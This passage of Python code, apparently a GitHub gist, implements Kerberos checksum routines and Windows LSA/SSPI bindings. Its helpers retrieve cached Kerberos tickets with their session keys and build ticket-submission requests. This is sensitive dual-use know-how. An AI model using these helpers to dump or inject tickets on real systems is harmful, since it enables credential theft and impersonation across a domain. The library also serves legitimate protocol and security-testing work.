expected = cls.checksum(key, keyusage, text) | |
if not _mac_equal(cksum, expected): | |
raise InvalidChecksum("checksum verification failure") | |
class _SimplifiedChecksum(_ChecksumProfile): | |
@classmethod | |
def checksum(cls, key, keyusage, text): | |
kc = cls.enc.derive(key, pack(">IB", keyusage, 0x99)) | |
hmac = HMAC.new(kc.contents, text, cls.enc.hashmod).digest() | |
return hmac[: cls.macsize] | |
@classmethod | |
def verify(cls, key, keyusage, text, cksum): | |
if key.enctype != cls.enc.enctype: | |
raise ValueError("Wrong key type for checksum") | |
super(_SimplifiedChecksum, cls).verify(key, keyusage, text, cksum) | |
class _SHA1AES128(_SimplifiedChecksum): | |
macsize = 12 | |
enc = _AES128CTS | |
class _SHA1AES256(_SimplifiedChecksum): | |
macsize = 12 | |
enc = _AES256CTS | |
class _SHA1DES3(_SimplifiedChecksum): | |
macsize = 20 | |
enc = _DES3CBC | |
class _HMACMD5(_ChecksumProfile): | |
@classmethod | |
def checksum(cls, key, keyusage, text): | |
ksign = HMAC.new(key.contents, b"signaturekey\x00", MD5).digest() | |
md5hash = MD5(_RC4.usage_str(keyusage) + text).digest() | |
return HMAC.new(ksign, md5hash, MD5).digest() | |
@classmethod | |
def verify(cls, key, keyusage, text, cksum): | |
if key.enctype != Enctype.RC4: | |
raise ValueError("Wrong key type for checksum") | |
super(_HMACMD5, cls).verify(key, keyusage, text, cksum) | |
_enctype_table: Dict[str, _SimplifiedEnctype] = { | |
Enctype.DES_MD5: _DESCBC, | |
Enctype.DES3: _DES3CBC, | |
Enctype.AES128: _AES128CTS, | |
Enctype.AES256: _AES256CTS, | |
Enctype.RC4: _RC4, | |
} | |
_checksum_table = { | |
Cksumtype.SHA1_DES3: _SHA1DES3, | |
Cksumtype.SHA1_AES128: _SHA1AES128, | |
Cksumtype.SHA1_AES256: _SHA1AES256, | |
Cksumtype.HMAC_MD5: _HMACMD5, | |
0xFFFFFF76: _HMACMD5, | |
} | |
def _get_enctype_profile(enctype): | |
if enctype not in _enctype_table: | |
raise ValueError("Invalid enctype %d" % enctype) | |
return _enctype_table[enctype] | |
def _get_checksum_profile(cksumtype): | |
if cksumtype not in _checksum_table: | |
raise ValueError("Invalid cksumtype %d" % cksumtype) | |
return _checksum_table[cksumtype] | |
class Key(object): | |
def __init__(self, enctype: Enctype, contents: bytes): | |
e = _get_enctype_profile(enctype) | |
if len(contents) != e.keysize: | |
raise ValueError("Wrong key length") | |
self.enctype = enctype | |
self.contents = contents | |
# -- netsecapi.py ---------------------------------------------------- | |
BYTE = c_ubyte | |
SHORT = c_int16 | |
USHORT = c_uint16 | |
LONG = c_int32 | |
LPVOID = c_void_p | |
PVOID = LPVOID | |
DWORD = c_uint32 | |
HANDLE = LPVOID | |
PHANDLE = POINTER(HANDLE) | |
LPHANDLE = PHANDLE | |
NTSTATUS = LONG | |
PNTSTATUS = POINTER(NTSTATUS) | |
USHORT = c_uint16 | |
ULONG = c_uint32 | |
PULONG = POINTER(ULONG) | |
LARGE_INTEGER = c_longlong | |
LPBYTE = POINTER(BYTE) | |
LPSTR = c_char_p | |
CHAR = c_char | |
PCHAR = LPSTR | |
SEC_CHAR = CHAR | |
PSEC_CHAR = PCHAR | |
ERROR_SUCCESS = 0 | |
maxtoken_size = 2880 | |
class SID: | |
def __init__(self): | |
self.Revision = None | |
self.SubAuthorityCount = None | |
self.IdentifierAuthority = None | |
self.SubAuthority = [] | |
def __str__(self): | |
t = "S-1-" | |
if self.IdentifierAuthority < 2**32: | |
t += str(self.IdentifierAuthority) | |
else: | |
t += "0x" + self.IdentifierAuthority.to_bytes(6, "big").hex().upper().rjust( | |
12, "0" | |
) | |
for i in self.SubAuthority: | |
t += "-" + str(i) | |
return t | |
@staticmethod | |
def from_ptr(ptr): | |
if ptr == None: | |
return None | |
data = string_at(ptr, 8) | |
buff = io.BytesIO(data) | |
sid = SID() | |
sid.Revision = int.from_bytes(buff.read(1), "little", signed=False) | |
sid.SubAuthorityCount = int.from_bytes(buff.read(1), "little", signed=False) | |
sid.IdentifierAuthority = int.from_bytes(buff.read(6), "big", signed=False) | |
data = string_at(ptr + 8, sid.SubAuthorityCount * 4) | |
buff = io.BytesIO(data) | |
for _ in range(sid.SubAuthorityCount): | |
sid.SubAuthority.append( | |
int.from_bytes(buff.read(4), "little", signed=False) | |
) | |
return sid | |
class KERB_PROTOCOL_MESSAGE_TYPE(enum.Enum): | |
KerbDebugRequestMessage = 0 | |
KerbQueryTicketCacheMessage = 1 | |
KerbChangeMachinePasswordMessage = 2 | |
KerbVerifyPacMessage = 3 | |
KerbRetrieveTicketMessage = 4 | |
KerbUpdateAddressesMessage = 5 | |
KerbPurgeTicketCacheMessage = 6 | |
KerbChangePasswordMessage = 7 | |
KerbRetrieveEncodedTicketMessage = 8 | |
KerbDecryptDataMessage = 9 | |
KerbAddBindingCacheEntryMessage = 10 | |
KerbSetPasswordMessage = 11 | |
KerbSetPasswordExMessage = 12 | |
KerbVerifyCredentialsMessage = 13 | |
KerbQueryTicketCacheExMessage = 14 | |
KerbPurgeTicketCacheExMessage = 15 | |
KerbRefreshSmartcardCredentialsMessage = 16 | |
KerbAddExtraCredentialsMessage = 17 | |
KerbQuerySupplementalCredentialsMessage = 18 | |
KerbTransferCredentialsMessage = 19 | |
KerbQueryTicketCacheEx2Message = 20 | |
KerbSubmitTicketMessage = 21 | |
KerbAddExtraCredentialsExMessage = 22 | |
KerbQueryKdcProxyCacheMessage = 23 | |
KerbPurgeKdcProxyCacheMessage = 24 | |
KerbQueryTicketCacheEx3Message = 25 | |
KerbCleanupMachinePkinitCredsMessage = 26 | |
KerbAddBindingCacheEntryExMessage = 27 | |
KerbQueryBindingCacheMessage = 28 | |
KerbPurgeBindingCacheMessage = 29 | |
KerbQueryDomainExtendedPoliciesMessage = 30 | |
KerbQueryS4U2ProxyCacheMessage = 31 | |
class SEC_E(enum.Enum): | |
OK = 0x00000000 | |
CONTINUE_NEEDED = 0x00090312 | |
INSUFFICIENT_MEMORY = ( | |
0x80090300 | |
) | |
INVALID_HANDLE = 0x80090301 | |
UNSUPPORTED_FUNCTION = 0x80090302 | |
TARGET_UNKNOWN = 0x80090303 | |
INTERNAL_ERROR = ( | |
0x80090304 | |
) | |
SECPKG_NOT_FOUND = 0x80090305 | |
NOT_OWNER = 0x80090306 | |
CANNOT_INSTALL = ( | |
0x80090307 | |
) | |
INVALID_TOKEN = 0x80090308 | |
CANNOT_PACK = 0x80090309 | |
QOP_NOT_SUPPORTED = 0x8009030A | |
NO_IMPERSONATION = ( | |
0x8009030B | |
) | |
LOGON_DENIED = 0x8009030C | |
UNKNOWN_CREDENTIALS = ( | |
0x8009030D | |
) | |
NO_CREDENTIALS = 0x8009030E | |
MESSAGE_ALTERED = 0x8009030F | |
OUT_OF_SEQUENCE = ( | |
0x80090310 | |
) | |
NO_AUTHENTICATING_AUTHORITY = ( | |
0x80090311 | |
) | |
BAD_PKGID = 0x80090316 | |
CONTEXT_EXPIRED = 0x80090317 | |
INCOMPLETE_MESSAGE = 0x80090318 | |
INCOMPLETE_CREDENTIALS = 0x80090320 | |
BUFFER_TOO_SMALL = 0x80090321 | |
WRONG_PRINCIPAL = 0x80090322 | |
TIME_SKEW = 0x80090324 | |
UNTRUSTED_ROOT = 0x80090325 | |
ILLEGAL_MESSAGE = ( | |
0x80090326 | |
) | |
CERT_UNKNOWN = ( | |
0x80090327 | |
) | |
CERT_EXPIRED = 0x80090328 | |
ENCRYPT_FAILURE = 0x80090329 | |
DECRYPT_FAILURE = 0x80090330 | |
ALGORITHM_MISMATCH = 0x80090331 | |
SECURITY_QOS_FAILED = 0x80090332 | |
UNFINISHED_CONTEXT_DELETED = 0x80090333 | |
NO_TGT_REPLY = 0x80090334 | |
NO_IP_ADDRESSES = 0x80090335 | |
WRONG_CREDENTIAL_HANDLE = 0x80090336 | |
CRYPTO_SYSTEM_INVALID = 0x80090337 | |
MAX_REFERRALS_EXCEEDED = ( | |
0x80090338 | |
) | |
MUST_BE_KDC = 0x80090339 | |
STRONG_CRYPTO_NOT_SUPPORTED = 0x8009033A | |
TOO_MANY_PRINCIPALS = ( | |
0x8009033B | |
) | |
NO_PA_DATA = 0x8009033C | |
PKINIT_NAME_MISMATCH = 0x8009033D | |
SMARTCARD_LOGON_REQUIRED = ( | |
0x8009033E | |
) | |
SHUTDOWN_IN_PROGRESS = 0x8009033F | |
KDC_INVALID_REQUEST = 0x80090340 | |
KDC_UNABLE_TO_REFER = 0x80090341 | |
KDC_UNKNOWN_ETYPE = ( | |
0x80090342 | |
) | |
UNSUPPORTED_PREAUTH = 0x80090343 | |
DELEGATION_REQUIRED = 0x80090345 | |
BAD_BINDINGS = 0x80090346 | |
MULTIPLE_ACCOUNTS = ( | |
0x80090347 | |
) | |
NO_KERB_KEY = 0x80090348 | |
CERT_WRONG_USAGE = ( | |
0x80090349 | |
) | |
DOWNGRADE_DETECTED = 0x80090350 | |
SMARTCARD_CERT_REVOKED = 0x80090351 | |
ISSUING_CA_UNTRUSTED = 0x80090352 | |
REVOCATION_OFFLINE_C = 0x80090353 | |
PKINIT_CLIENT_FAILURE = 0x80090354 | |
SMARTCARD_CERT_EXPIRED = 0x80090355 | |
NO_S4U_PROT_SUPPORT = 0x80090356 | |
CROSSREALM_DELEGATION_FAILURE = 0x80090357 | |
REVOCATION_OFFLINE_KDC = 0x80090358 | |
ISSUING_CA_UNTRUSTED_KDC = 0x80090359 | |
KDC_CERT_EXPIRED = 0x8009035A | |
KDC_CERT_REVOKED = 0x8009035B | |
INVALID_PARAMETER = ( | |
0x8009035D | |
) | |
DELEGATION_POLICY = 0x8009035E | |
POLICY_NLTM_ONLY = 0x8009035F | |
RENEGOTIATE = 590625 | |
COMPLETE_AND_CONTINUE = 590612 | |
COMPLETE_NEEDED = 590611 | |
class SECPKG_CRED(enum.IntFlag): | |
AUTOLOGON_RESTRICTED = 0x00000010 | |
BOTH = 3 | |
INBOUND = 1 | |
OUTBOUND = 2 | |
PROCESS_POLICY_ONLY = 0x00000020 | |
class ISC_REQ(enum.IntFlag): | |
DELEGATE = 1 | |
MUTUAL_AUTH = 2 | |
REPLAY_DETECT = 4 | |
SEQUENCE_DETECT = 8 | |
CONFIDENTIALITY = 16 | |
USE_SESSION_KEY = 32 | |
PROMPT_FOR_CREDS = 64 | |
USE_SUPPLIED_CREDS = 128 | |
ALLOCATE_MEMORY = 256 | |
USE_DCE_STYLE = 512 | |
DATAGRAM = 1024 | |
CONNECTION = 2048 | |
CALL_LEVEL = 4096 | |
FRAGMENT_SUPPLIED = 8192 | |
EXTENDED_ERROR = 16384 | |
STREAM = 32768 | |
INTEGRITY = 65536 | |
IDENTIFY = 131072 | |
NULL_SESSION = 262144 | |
MANUAL_CRED_VALIDATION = 524288 | |
RESERVED1 = 1048576 | |
FRAGMENT_TO_FIT = 2097152 | |
HTTP = 0x10000000 | |
class SECPKG_ATTR(enum.Enum): | |
SESSION_KEY = 9 | |
C_ACCESS_TOKEN = 0x80000012 | |
C_FULL_ACCESS_TOKEN = 0x80000082 | |
CERT_TRUST_STATUS = 0x80000084 | |
CREDS = 0x80000080 | |
CREDS_2 = 0x80000086 | |
NEGOTIATION_PACKAGE = 0x80000081 | |
PACKAGE_INFO = 10 | |
SERVER_AUTH_FLAGS = 0x80000083 | |
SIZES = 0x0 | |
SUBJECT_SECURITY_ATTRIBUTES = 124 | |
ENDPOINT_BINDINGS = 26 | |
class SECBUFFER_TYPE(enum.Enum): | |
SECBUFFER_ALERT = 17 | |
SECBUFFER_ATTRMASK = 4026531840 | |
SECBUFFER_CHANNEL_BINDINGS = 14 | |
SECBUFFER_CHANGE_PASS_RESPONSE = ( | |
15 | |
) | |
SECBUFFER_DATA = 1 | |
SECBUFFER_DTLS_MTU = 24 | |
SECBUFFER_EMPTY = 0 | |
SECBUFFER_EXTRA = 5 | |
SECBUFFER_MECHLIST = 11 | |
SECBUFFER_MECHLIST_SIGNATURE = 12 | |
SECBUFFER_MISSING = 4 | |
SECBUFFER_PKG_PARAMS = 3 | |
SECBUFFER_PRESHARED_KEY = 22 | |
SECBUFFER_PRESHARED_KEY_IDENTITY = ( | |
23 | |
) | |
SECBUFFER_SRTP_MASTER_KEY_IDENTIFIER = ( | |
20 | |
) | |
SECBUFFER_SRTP_PROTECTION_PROFILES = 19 | |
SECBUFFER_STREAM_HEADER = 7 | |
SECBUFFER_STREAM_TRAILER = 6 | |
SECBUFFER_TARGET = 13 | |
SECBUFFER_TARGET_HOST = ( | |
16 | |
) | |
SECBUFFER_TOKEN = 2 | |
SECBUFFER_TOKEN_BINDING = 21 | |
SECBUFFER_APPLICATION_PROTOCOLS = 18 | |
SECBUFFER_PADDING = 9 | |
class FILETIME(Structure): | |
_fields_ = [ | |
("dwLowDateTime", DWORD), | |
("dwHighDateTime", DWORD), | |
] | |
PFILETIME = POINTER(FILETIME) | |
TimeStamp = FILETIME | |
PTimeStamp = PFILETIME | |
class SecPkgContext_SessionKey(Structure): | |
_fields_ = [("SessionKeyLength", ULONG), ("SessionKey", LPBYTE)] | |
@property | |
def Buffer(self): | |
return string_at(self.SessionKey, size=self.SessionKeyLength) | |
class SecHandle(Structure): | |
_fields_ = [("dwLower", POINTER(ULONG)), ("dwUpper", POINTER(ULONG))] | |
def __init__( | |
self, | |
): | |
super(SecHandle, self).__init__(pointer(ULONG()), pointer(ULONG())) | |
class SecBuffer(Structure): | |
_fields_ = [("cbBuffer", ULONG), ("BufferType", ULONG), ("pvBuffer", PVOID)] | |
def __init__( | |
self, token=b"\x00" * maxtoken_size, buffer_type=SECBUFFER_TYPE.SECBUFFER_TOKEN | |
): | |
buf = create_string_buffer(token, size=len(token)) | |
Structure.__init__( | |
self, sizeof(buf), buffer_type.value, cast(byref(buf), PVOID) | |
) | |
@property | |
def Buffer(self): | |
return ( | |
SECBUFFER_TYPE(self.BufferType), | |
string_at(self.pvBuffer, size=self.cbBuffer), | |
) | |
class SecBufferDesc(Structure): | |
_fields_ = [ | |
("ulVersion", ULONG), | |
("cBuffers", ULONG), | |
("pBuffers", POINTER(SecBuffer)), | |
] | |
def __init__(self, secbuffers=None): | |
if secbuffers is not None: | |
Structure.__init__( | |
self, 0, len(secbuffers), (SecBuffer * len(secbuffers))(*secbuffers) | |
) | |
else: | |
Structure.__init__(self, 0, 1, pointer(SecBuffer())) | |
def __getitem__(self, index): | |
return self.pBuffers[index] | |
@property | |
def Buffers(self): | |
data = [] | |
for i in range(self.cBuffers): | |
data.append(self.pBuffers[i].Buffer) | |
return data | |
PSecBufferDesc = POINTER(SecBufferDesc) | |
PSecHandle = POINTER(SecHandle) | |
CredHandle = SecHandle | |
PCredHandle = PSecHandle | |
CtxtHandle = SecHandle | |
PCtxtHandle = PSecHandle | |
class LUID(Structure): | |
_fields_ = [ | |
("LowPart", DWORD), | |
("HighPart", LONG), | |
] | |
def to_int(self): | |
return LUID.luid_to_int(self) | |
@staticmethod | |
def luid_to_int(luid): | |
return (luid.HighPart << 32) + luid.LowPart | |
@staticmethod | |
def from_int(i): | |
luid = LUID() | |
luid.HighPart = i >> 32 | |
luid.LowPart = i & 0xFFFFFFFF | |
return luid | |
PLUID = POINTER(LUID) | |
class LSA_STRING(Structure): | |
_fields_ = [ | |
("Length", USHORT), | |
("MaximumLength", USHORT), | |
("Buffer", POINTER(c_char)), | |
] | |
def to_string(self): | |
return string_at(self.Buffer, self.MaximumLength).decode() | |
PLSA_STRING = POINTER(LSA_STRING) | |
class LSA_UNICODE_STRING(Structure): | |
_fields_ = [ | |
("Length", USHORT), | |
("MaximumLength", USHORT), | |
("Buffer", POINTER(c_char)), | |
] | |
@staticmethod | |
def from_string(s): | |
s = s.encode("utf-16-le") | |
lus = LSA_UNICODE_STRING() | |
lus.Buffer = create_string_buffer(s, len(s)) | |
lus.MaximumLength = len(s) + 1 | |
lus.Length = len(s) | |
return lus | |
def to_string(self): | |
return ( | |
string_at(self.Buffer, self.MaximumLength) | |
.decode("utf-16-le") | |
.replace("\x00", "") | |
) | |
class KERB_CRYPTO_KEY(Structure): | |
_fields_ = [ | |
("KeyType", LONG), | |
("Length", ULONG), | |
("Value", PVOID), | |
] | |
def to_dict(self): | |
return {"KeyType": self.KeyType, "Key": string_at(self.Value, self.Length)} | |
class KERB_EXTERNAL_TICKET(Structure): | |
_fields_ = [ | |
("ServiceName", PVOID), | |
("TargetName", PVOID), | |
("ClientName", PVOID), | |
("DomainName", LSA_UNICODE_STRING), | |
("TargetDomainName", LSA_UNICODE_STRING), | |
("AltTargetDomainName", LSA_UNICODE_STRING), | |
("SessionKey", KERB_CRYPTO_KEY), | |
("TicketFlags", ULONG), | |
("Flags", ULONG), | |
("KeyExpirationTime", LARGE_INTEGER), | |
("StartTime", LARGE_INTEGER), | |
("EndTime", LARGE_INTEGER), | |
("RenewUntil", LARGE_INTEGER), | |
("TimeSkew", LARGE_INTEGER), | |
("EncodedTicketSize", ULONG), | |
("EncodedTicket", PVOID), | |
] | |
def get_data(self): | |
return { | |
"Key": self.SessionKey.to_dict(), | |
"Ticket": string_at(self.EncodedTicket, self.EncodedTicketSize), | |
} | |
class KERB_SUBMIT_TKT_REQUEST(Structure): | |
_fields_ = [ | |
("MessageType", DWORD), | |
("LogonId", LUID), | |
("TicketFlags", ULONG), | |
("Key", KERB_CRYPTO_KEY), | |
("KerbCredSize", ULONG), | |
("KerbCredOffset", ULONG), | |
] | |
KERB_SUBMIT_TKT_REQUEST_OFFSET = sizeof(KERB_SUBMIT_TKT_REQUEST()) | |
def submit_tkt_helper(ticket_data, logonid=0): | |
offset = KERB_SUBMIT_TKT_REQUEST_OFFSET - 4 | |
if isinstance(logonid, int): | |
logonid = LUID.from_int(logonid) | |
class KERB_SUBMIT_TKT_REQUEST(Structure): | |
_pack_ = 4 | |
_fields_ = [ | |
("MessageType", DWORD), | |
("LogonId", LUID), | |
("TicketFlags", ULONG), | |
("Length", ULONG), | |
("Value", PVOID), | |
("KerbCredSize", ULONG), | |
("KerbCredOffset", ULONG), | |
("TicketData", c_byte * len(ticket_data)), | |
] | |
req = KERB_SUBMIT_TKT_REQUEST() | |
req.MessageType = KERB_PROTOCOL_MESSAGE_TYPE.KerbSubmitTicketMessage.value | |
req.LogonId = logonid | |
req.TicketFlags = 0 | |
req.Key = KERB_CRYPTO_KEY() | |
req.KerbCredSize = len(ticket_data) | |
req.TicketData = (c_byte * len(ticket_data))(*ticket_data) | |
req.KerbCredOffset = offset | |
return req | |
class KERB_RETRIEVE_TKT_REQUEST(Structure): | |
_fields_ = [ | |
("MessageType", DWORD), | |
("LogonId", LUID), | |
("TargetName", LSA_UNICODE_STRING), | |
("TicketFlags", ULONG), | |
("CacheOptions", ULONG), | |
("EncryptionType", LONG), | |
("CredentialsHandle", PVOID), | |
] | |
def __init__( | |
self, | |
targetname, | |
ticketflags=0x0, | |
cacheoptions=0x8, | |
encryptiontype=0x0, | |
logonid=0, | |
): | |
if isinstance(logonid, int): | |
logonid = LUID.from_int(logonid) | |
super(KERB_RETRIEVE_TKT_REQUEST, self).__init__( | |
KERB_PROTOCOL_MESSAGE_TYPE.KerbRetrieveEncodedTicketMessage.value, | |
logonid, | |
LSA_UNICODE_STRING.from_string(targetname), | |
ticketflags, | |
cacheoptions, | |
encryptiontype, | |
None, | |
) | |
def retrieve_tkt_helper( | |
targetname, | |
logonid=0, | |
ticketflags=0x0, | |
cacheoptions=0x8, | |
encryptiontype=0x0, | |
temp_offset=0, | |
): | |
if isinstance(logonid, int): | |
logonid = LUID.from_int(logonid) | |
targetname_enc = targetname.encode("utf-16-le") + b"\x00\x00" | |
targetname_len_alloc = len(targetname_enc) | |
class KERB_RETRIEVE_TKT_REQUEST(Structure): | |
_fields_ = [ | |
("MessageType", DWORD), | |
("LogonId", LUID), | |
("TargetName", LSA_UNICODE_STRING), | |
("TicketFlags", ULONG), | |
("CacheOptions", ULONG), | |
("EncryptionType", LONG), | |
("CredentialsHandle", PVOID), | |
( | |
"UNK", | |
PVOID, | |
), | |
("TargetNameData", (c_byte * targetname_len_alloc)), | |
] | |
req = KERB_RETRIEVE_TKT_REQUEST() | |
req.MessageType = KERB_PROTOCOL_MESSAGE_TYPE.KerbRetrieveEncodedTicketMessage.value | |
req.LogonId = logonid | |
req.TicketFlags = ticketflags | |
req.CacheOptions = cacheoptions | |
req.EncryptionType = encryptiontype | |
req.TargetNameData = (c_byte * len(targetname_enc))(*targetname_enc) | |
struct_end = addressof(req) + sizeof(req) | |
targetname_start = struct_end - targetname_len_alloc | |
targetname_start_padded = targetname_start - (targetname_start % sizeof(c_void_p)) | |
lsa_target = LSA_UNICODE_STRING() | |
lsa_target.Length = len(targetname.encode("utf-16-le")) | |
lsa_target.MaximumLength = targetname_len_alloc | |
lsa_target.Buffer = cast(targetname_start_padded, POINTER(c_char)) | |
req.TargetName = lsa_target | |
return req | |
class KERB_RETRIEVE_TKT_RESPONSE(Structure): | |
_fields_ = [ | |
("Ticket", KERB_EXTERNAL_TICKET), | |
] | |
try: | |
INVALID_HANDLE_VALUE = c_void_p(-1).value | |
except TypeError: | |
if sizeof(c_void_p) == 4: | |
INVALID_HANDLE_VALUE = 0xFFFFFFFF | |
elif sizeof(c_void_p) == 8: | |
INVALID_HANDLE_VALUE = 0xFFFFFFFFFFFFFFFF | |
else: | |
raise | |
def get_lsa_error(ret_status): | |
return WinError(LsaNtStatusToWinError(ret_status)) | |
def LsaRaiseIfNotErrorSuccess(result, func=None, arguments=()): | |
if result != ERROR_SUCCESS: | |
raise WinError(LsaNtStatusToWinError(result)) | |
return result | |
def LsaNtStatusToWinError(errcode): | |
_LsaConnectUntrusted = windll.Advapi32.LsaNtStatusToWinError | |
_LsaConnectUntrusted.argtypes = [NTSTATUS] | |
_LsaConnectUntrusted.restype = ULONG | |
res = _LsaConnectUntrusted(errcode) | |
if res == 0x13D: | |
raise Exception("ERROR_MR_MID_NOT_FOUND for %s" % errcode) | |
return res | |
def LsaFreeReturnBuffer(pbuffer): | |
_LsaFreeReturnBuffer = windll.Secur32.LsaFreeReturnBuffer | |
_LsaFreeReturnBuffer.argtypes = [PVOID] | |
_LsaFreeReturnBuffer.restype = NTSTATUS | |
_LsaFreeReturnBuffer.errcheck = LsaRaiseIfNotErrorSuccess | |
_LsaFreeReturnBuffer(pbuffer) | |
def LsaConnectUntrusted(): | |
_LsaConnectUntrusted = windll.Secur32.LsaConnectUntrusted | |
_LsaConnectUntrusted.argtypes = [PHANDLE] | |
_LsaConnectUntrusted.restype = NTSTATUS | |
_LsaConnectUntrusted.errcheck = LsaRaiseIfNotErrorSuccess | |
lsa_handle = HANDLE(INVALID_HANDLE_VALUE) | |
_LsaConnectUntrusted(byref(lsa_handle)) | |
return lsa_handle | |
def LsaLookupAuthenticationPackage(lsa_handle, package_name): | |
_LsaLookupAuthenticationPackage = windll.Secur32.LsaLookupAuthenticationPackage | |
_LsaLookupAuthenticationPackage.argtypes = [HANDLE, PLSA_STRING, PULONG] | |
_LsaLookupAuthenticationPackage.restype = NTSTATUS | |
_LsaLookupAuthenticationPackage.errcheck = LsaRaiseIfNotErrorSuccess | |
if isinstance(package_name, str): | |
package_name = package_name.encode() | |
pname = LSA_STRING() | |
pname.Buffer = create_string_buffer(package_name) | |
pname.Length = len(package_name) | |
pname.MaximumLength = len(package_name) + 1 | |
package_id = ULONG(0) | |
_LsaLookupAuthenticationPackage(lsa_handle, byref(pname), byref(package_id)) | |
return package_id.value | |
def LsaCallAuthenticationPackage(lsa_handle, package_id, message): | |
_LsaCallAuthenticationPackage = windll.Secur32.LsaCallAuthenticationPackage | |
_LsaCallAuthenticationPackage.argtypes = [ | |
HANDLE, | |
ULONG, | |
PVOID, | |
ULONG, | |
PVOID, | |
PULONG, | |
PNTSTATUS, | |
] | |
_LsaCallAuthenticationPackage.restype = DWORD | |
_LsaCallAuthenticationPackage.errcheck = LsaRaiseIfNotErrorSuccess | |
if not isinstance(message, Structure): | |
message = bytes(message) | |
message_len = len(message) | |
else: | |
message_len = len(bytes(message)) | |
return_msg_p = c_void_p() | |
return_msg_len = ULONG(0) | |
return_status = NTSTATUS(INVALID_HANDLE_VALUE) | |
_LsaCallAuthenticationPackage( | |
lsa_handle, | |
package_id, | |
byref(message), | |
message_len, | |
byref(return_msg_p), | |
byref(return_msg_len), | |
byref(return_status), | |
) | |
return_msg = b"" | |
free_ptr = None | |
if return_msg_len.value > 0: | |
return_msg = string_at(return_msg_p, return_msg_len.value) | |
free_ptr = return_msg_p | |
return return_msg, return_status.value, free_ptr | |
def AcquireCredentialsHandle( | |
client_name, package_name, tragetspn, cred_usage, pluid=None, authdata=None | |
): | |
def errc(result, func, arguments): | |
if SEC_E(result) == SEC_E.OK: | |
return result | |
raise Exception( | |
"%s failed with error code %s (%s)" | |
% ("AcquireCredentialsHandle", result, SEC_E(result)) | |
) | |
_AcquireCredentialsHandle = windll.Secur32.AcquireCredentialsHandleA | |
_AcquireCredentialsHandle.argtypes = [ | |
PSEC_CHAR, | |
PSEC_CHAR, | |
ULONG, | |
PLUID, | |
PVOID, | |
PVOID, | |
PVOID, | |
PCredHandle, | |
PTimeStamp, | |
] | |
_AcquireCredentialsHandle.restype = DWORD | |
_AcquireCredentialsHandle.errcheck = errc | |
cn = None | |
if client_name: | |
cn = LPSTR(client_name.encode("ascii")) | |
pn = LPSTR(package_name.encode("ascii")) | |
creds = CredHandle() | |
ts = TimeStamp() | |
_AcquireCredentialsHandle( | |
cn, pn, cred_usage, pluid, authdata, None, None, byref(creds), byref(ts) | |
) | |
return creds | |
def QueryContextAttributes(ctx, attr, sec_struct): | |
def errc(result, func, arguments): | |
if SEC_E(result) == SEC_E.OK: | |
return SEC_E(result) | |
raise Exception( | |
"%s failed with error code %s (%s)" | |
% ("QueryContextAttributes", result, SEC_E(result)) | |
) | |
_QueryContextAttributes = windll.Secur32.QueryContextAttributesW | |
_QueryContextAttributes.argtypes = [PCtxtHandle, ULONG, PVOID] | |
_QueryContextAttributes.restype = DWORD | |
_QueryContextAttributes.errcheck = errc | |
_QueryContextAttributes(byref(ctx), attr.value, byref(sec_struct)) | |
return | |
def InitializeSecurityContext( | |
creds, | |
target, | |
ctx=None, | |
flags=ISC_REQ.INTEGRITY | |
| ISC_REQ.CONFIDENTIALITY | |
| ISC_REQ.SEQUENCE_DETECT | |
| ISC_REQ.REPLAY_DETECT, | |
TargetDataRep=0, | |
token=None, | |
): | |
def errc(result, func, arguments): | |
if SEC_E(result) in [ | |
SEC_E.OK, | |
SEC_E.COMPLETE_AND_CONTINUE, | |
SEC_E.COMPLETE_NEEDED, | |
SEC_E.CONTINUE_NEEDED, | |
SEC_E.INCOMPLETE_CREDENTIALS, | |
]: | |
return SEC_E(result) | |
raise Exception( | |
"%s failed with error code %s (%s)" | |
% ("InitializeSecurityContext", result, SEC_E(result)) | |
) | |
_InitializeSecurityContext = windll.Secur32.InitializeSecurityContextA | |
_InitializeSecurityContext.argtypes = [ | |
PCredHandle, | |
PCtxtHandle, | |
PSEC_CHAR, | |
ULONG, | |
ULONG, | |
ULONG, | |
PSecBufferDesc, | |
ULONG, | |
PCtxtHandle, | |
PSecBufferDesc, | |
PULONG, | |
PTimeStamp, | |
] | |
_InitializeSecurityContext.restype = DWORD | |
_InitializeSecurityContext.errcheck = errc | |
if target: | |
ptarget = LPSTR(target.encode("ascii")) | |
else: | |
ptarget = None | |
newbuf = SecBufferDesc() | |
outputflags = ULONG() | |
expiry = TimeStamp() | |
if token: | |
token = SecBufferDesc([SecBuffer(token)]) | |
if not ctx: | |
ctx = CtxtHandle() | |
res = _InitializeSecurityContext( | |
byref(creds), | |
None, | |
ptarget, | |
int(flags), | |
0, | |
TargetDataRep, | |
byref(token) if token else None, | |
0, | |
byref(ctx), | |
byref(newbuf), | |
byref(outputflags), | |
byref(expiry), | |
) | |
else: | |
res = _InitializeSecurityContext( | |
byref(creds), | |
byref(ctx), | |
ptarget, | |
int(flags), | |
0, | |
TargetDataRep, | |
byref(token) if token else None, | |
0, | |
byref(ctx), | |
byref(newbuf), | |
byref(outputflags), | |
byref(expiry), | |
) | |
data = newbuf.Buffers | |
return res, ctx, data, ISC_REQ(outputflags.value), expiry | |
def extract_ticket(lsa_handle, package_id, luid, target_name): | |
message = retrieve_tkt_helper(target_name, logonid=luid) | |
ret_msg, ret_status, free_ptr = LsaCallAuthenticationPackage( | |
lsa_handle, package_id, message | |
) | |
ticket = {} | |
if ret_status != 0: | |
raise WinError(LsaNtStatusToWinError(ret_status)) | |
if len(ret_msg) > 0: | |
resp = KERB_RETRIEVE_TKT_RESPONSE.from_buffer_copy(ret_msg) | |
ticket = resp.Ticket.get_data() | |
LsaFreeReturnBuffer(free_ptr) | |
return ticket |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment